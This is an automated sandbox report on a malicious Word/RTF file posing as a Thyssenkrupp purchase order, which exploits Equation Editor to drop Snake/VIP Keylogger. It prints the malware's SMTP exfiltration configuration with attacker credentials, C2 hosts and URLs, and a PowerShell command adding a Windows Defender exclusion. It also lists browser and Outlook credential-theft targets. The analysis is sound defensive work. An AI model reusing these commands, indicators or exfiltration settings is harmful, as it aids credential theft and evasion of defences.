Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Thyssenkrupp PO040232.doc

Overview

General Information

Sample name:Thyssenkrupp PO040232.doc
Analysis ID:1519252
MD5:d441cab32cafefaed9326b791cfc3b15
SHA1:44aa1ba0ae5fb845899750881708003365937cea
SHA256:b9a387acc992d7431adfbbf28a1b18baa07c1dc64592c193d78c6a517747692d
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential downloader shellcode found
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to download and execute PE files
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3184 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • hgqilegacy20306.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: 3E2EA8C3F5CA13F16F8CA1C85087F6B6)
        • powershell.exe (PID: 3492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • hgqilegacy20306.exe (PID: 3508 cmdline: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: 3E2EA8C3F5CA13F16F8CA1C85087F6B6)
    • EQNEDT32.EXE (PID: 3760 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
Thyssenkrupp PO040232.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb8a2:$obj2: \objdata
  • 0xb8b6:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2e434:$a1: get_encryptedPassword
        • 0x2e9bc:$a2: get_encryptedUsername
        • 0x2e0a7:$a3: get_timePasswordChanged
        • 0x2e1be:$a4: get_passwordField
        • 0x2e44a:$a5: set_encryptedPassword
        • 0x31173:$a6: get_passwords
        • 0x31507:$a7: get_logins
        • 0x3115f:$a8: GetOutlookPasswords
        • 0x30b18:$a9: StartKeylogger
        • 0x31460:$a10: KeyLoggerEventArgs
        • 0x30bb8:$a11: KeyLoggerEventArgsEventHandler
        00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          5.2.hgqilegacy20306.exe.3415480.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.hgqilegacy20306.exe.3415480.7.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              5.2.hgqilegacy20306.exe.3415480.7.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.hgqilegacy20306.exe.3415480.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2c834:$a1: get_encryptedPassword
                • 0x2cdbc:$a2: get_encryptedUsername
                • 0x2c4a7:$a3: get_timePasswordChanged
                • 0x2c5be:$a4: get_passwordField
                • 0x2c84a:$a5: set_encryptedPassword
                • 0x2f573:$a6: get_passwords
                • 0x2f907:$a7: get_logins
                • 0x2f55f:$a8: GetOutlookPasswords
                • 0x2ef18:$a9: StartKeylogger
                • 0x2f860:$a10: KeyLoggerEventArgs
                • 0x2efb8:$a11: KeyLoggerEventArgsEventHandler
                5.2.hgqilegacy20306.exe.3415480.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39e76:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39519:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39776:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3a155:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 26 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentProcessId: 3416, ParentProcessName: hgqilegacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3492, ProcessName: powershell.exe
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3268, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3416, ProcessName: hgqilegacy20306.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3268, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3416, ProcessName: hgqilegacy20306.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentProcessId: 3416, ParentProcessName: hgqilegacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3492, ProcessName: powershell.exe
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, QueryName: checkip.dyndns.org
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 217.12.218.219, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, Initiated: true, ProcessId: 3508, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49180
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3268, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentProcessId: 3416, ParentProcessName: hgqilegacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3492, ProcessName: powershell.exe
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Local\Temp\m0e2fsxs.vl2.ps1
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:19:22.080013+020020220501A Network Trojan was detected66.63.187.12380192.168.2.2249161TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:19:22.216241+020020220511A Network Trojan was detected66.63.187.12380192.168.2.2249161TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:19:29.445238+020028033053Unknown Traffic192.168.2.2249164188.114.97.3443TCP
                2024-09-26T09:19:30.835613+020028033053Unknown Traffic192.168.2.2249166188.114.96.3443TCP
                2024-09-26T09:19:33.963816+020028033053Unknown Traffic192.168.2.2249170188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:19:27.712093+020028032742Potentially Bad Traffic192.168.2.2249162193.122.130.080TCP
                2024-09-26T09:19:29.038087+020028032742Potentially Bad Traffic192.168.2.2249162193.122.130.080TCP
                2024-09-26T09:19:30.394686+020028032742Potentially Bad Traffic192.168.2.2249165132.226.247.7380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Thyssenkrupp PO040232.docAvira: detected
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}
                Source: Thyssenkrupp PO040232.docReversingLabs: Detection: 44%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org

                Exploits

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.123 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB15
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB15
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB9C URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB9C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACBD6 CreateProcessW,ExitProcess,2_2_002ACBD6
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACC0F ExitProcess,2_2_002ACC0F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACA56 ExitProcess,2_2_002ACA56
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACA8B URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACA8B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB2F URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB2F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACBB5 CreateProcessW,ExitProcess,2_2_002ACBB5
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0023E8C5h5_2_0023E478
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0023E8C5h5_2_0023DE2C
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0023E8C5h5_2_0023DF4A
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_002569B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00259743h8_2_00259330
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025767Dh8_2_00257490
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00258007h8_2_00257490
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00259181h8_2_00258EC4
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025EB89h8_2_0025E8A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_002571C9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025F4B9h8_2_0025F1D9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025FDE9h8_2_0025FB08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025F021h8_2_0025ED40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0025F951h8_2_0025F670
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00259743h8_2_00259672
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_00256FEA
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F85AAh8_2_005F82B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F4321h8_2_005F4050
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FE54Ah8_2_005FE250
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F5A19h8_2_005F5748
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FBA42h8_2_005FB748
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F0311h8_2_005F0040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F7111h8_2_005F6E40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F8F3Ah8_2_005F8C40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F6349h8_2_005F6078
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F8A72h8_2_005F8778
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F0C41h8_2_005F0970
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F7A41h8_2_005F7770
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FF86Ah8_2_005FF570
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F2339h8_2_005F2068
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FCD62h8_2_005FCA68
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F3A09h8_2_005F3760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FA25Ah8_2_005F9F60
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F50E9h8_2_005F4E18
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FEA12h8_2_005FE718
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F67E2h8_2_005F6510
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FBF0Ah8_2_005FBC10
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F10D9h8_2_005F0E08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F7F7Ah8_2_005F7C08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F9402h8_2_005F9108
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F27D1h8_2_005F2500
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F1A09h8_2_005F1738
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FFD32h8_2_005FFA38
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F3101h8_2_005F2E30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FD22Ah8_2_005FCF30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FA722h8_2_005FA428
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F07A9h8_2_005F04D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F75A9h8_2_005F72D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FC3D2h8_2_005FC0D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F1EA1h8_2_005F1BD0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F98CAh8_2_005F95D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F3599h8_2_005F32C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FDBBAh8_2_005FD8C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FD6F2h8_2_005FD3F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FABEAh8_2_005FA8F0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F47B9h8_2_005F44E8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F5EB1h8_2_005F5BE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FEEDAh8_2_005FEBE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F2C69h8_2_005F2998
